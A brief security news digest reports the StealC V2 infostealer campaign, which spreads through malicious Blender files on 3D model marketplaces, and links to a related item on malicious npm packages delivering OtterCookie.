StealC V2 Malware Spread via Blender Files on 3D Sites

Cybersecurity firm Morphisec reported that StealC V2 infostealer is being spread through malicious Blender files on 3D model marketplaces. The malware abuses Blender’s ability to run Python scripts for automation and add-ons. The campaign, active for at least six months, involves implanting malicious .blend files on platforms like CGTrader. Users unknowingly download these files, which execute embedded Python scripts upon opening in Blender. The attack chain begins with a tampered Rig_Ui.py script embedded inside the .blend file, which fetches a loader from a remote domain, downloading a PowerShell stage and ZIP archives containing Python-based stealers. The malware creates LNK files to secure persistence and uses Pyramid C2 channels to retrieve encrypted payloads. StealC V2 now targets more than 23 browsers, over 100 plugins, more than 15 desktop wallets, and a range of messaging, VPN, and mail clients.

Latest mentioned: 11-26

Earliest mentioned: 11-24

Sources

gbhackers.com securityaffairs.com infosecurity-magazine.com bleepingcomputer.com thehackernews.com

Also Read

Contagious Interview Campaign Floods npm with Malicious Packages

Threat actors behind the Contagious Interview campaign have continued to infiltrate the npm registry with 197 more malicious packages since last month. These packages, designed to deliver a variant of OtterCookie, have been downloaded over 31,000 times. The malware evades sandboxes, profiles the machine, and establishes a command-and-control channel to steal sensitive data. The campaign targets blockchain and Web3 developers through fake job interviews and test assignments.

11-29Read more →